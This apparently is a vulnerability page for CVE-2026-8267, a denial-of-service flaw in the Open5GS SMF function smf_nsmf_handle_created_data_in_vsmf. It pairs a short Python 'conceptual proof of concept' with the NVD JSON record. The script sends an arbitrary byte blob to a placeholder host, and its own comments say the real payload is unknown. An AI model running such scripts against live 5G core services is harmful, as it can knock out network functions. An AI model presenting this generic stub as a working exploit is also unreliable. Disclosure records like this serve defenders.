CVE-2026-8267

import socket import struct # Conceptual Proof of Concept for CVE-2026-8267 # This script attempts to trigger the DoS in Open5GS SMF # by sending a crafted packet to the vulnerable function. def trigger_dos(target_ip, target_port): print(f"[*] Connecting to {target_ip}:{target_port}...") try: # Create a raw socket or use appropriate protocol socket (e.g., SCTP or HTTP) # Assuming standard network communication for demonstration sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) # Crafted payload designed to trigger the flaw in smf_nsmf_handle_created_data_in_vsmf # The specific bytes would depend on the protocol structure (e.g., NAS, NGAP, or HTTP API) # This represents a malformed data structure. malicious_payload = b"\x00\x01\x02\x03" * 100 + b"\xFF\xFF\xFF\xFF" print("[*] Sending malicious payload...") sock.send(malicious_payload) response = sock.recv(1024) print(f"[+] Received response (might be empty if crashed): {response}") except Exception as e: print(f"[!] Connection failed or service crashed: {e}") finally: sock.close() if __name__ == "__main__": # Replace with actual target details TARGET = "192.168.1.10" PORT = 7777 # Example port, actual SMF interface may vary trigger_dos(TARGET, PORT)

{"cve": {"id": "CVE-2026-8267", "sourceIdentifier": "[email protected]", "published": "2026-05-11T04:16:20.233", "lastModified": "2026-05-11T16:17:42.780", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Open5GS up to 2.7.7. This vulnerability affects the function smf_nsmf_handle_created_data_in_vsmf of the component SMF. This manipulation causes denial of service. The attack may be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4448", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808484", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362564", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362564/cti", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808484", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}